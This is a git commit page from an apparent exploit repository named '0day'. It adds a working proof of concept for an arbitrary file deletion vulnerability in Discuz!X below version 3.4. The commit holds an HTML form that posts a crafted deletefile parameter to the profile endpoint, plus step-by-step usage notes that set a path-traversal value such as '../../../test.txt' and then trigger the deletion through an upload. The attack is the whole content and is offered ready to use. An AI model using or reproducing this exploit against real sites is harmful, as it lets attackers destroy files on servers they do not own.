admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add Discuz anyfile delete

Browse Source
This commit is contained in:
Mr5m1th 2017-10-11 20:25:28 +08:00
parent d3c192f2c2
commit 2e7ca75821
2 changed files with 13 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
CMS/Discuz/Discuz_v3.4/README.md Normal file
View File

@ -0,0 +1 @@
Discuz!x v_3.4以下 任意文件删除漏洞

12
CMS/Discuz/Discuz_v3.4/form.php Normal file
View File

@ -0,0 +1,12 @@
<form action="http://127.0.0.1/upload/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">
<input type="file"name="birthprovince" id="file" />
<input type="text"name="formhash" value="de746a38"/></p>
<input type="text"name="profilesubmit" value="1"/></p>
<input type="submit"value="Submit" />
</from>
<!--
Usages:
step1 : GET http://127.0.0.1/upload/home.php?mod=spacecp&ac=profile&op=base and POST birthprovince=../../../test.txt[the file you delete]&profilesubmit=1&formhash=2fce4b73[your hash]
step2 : upload jpg from form.php then file delete
-->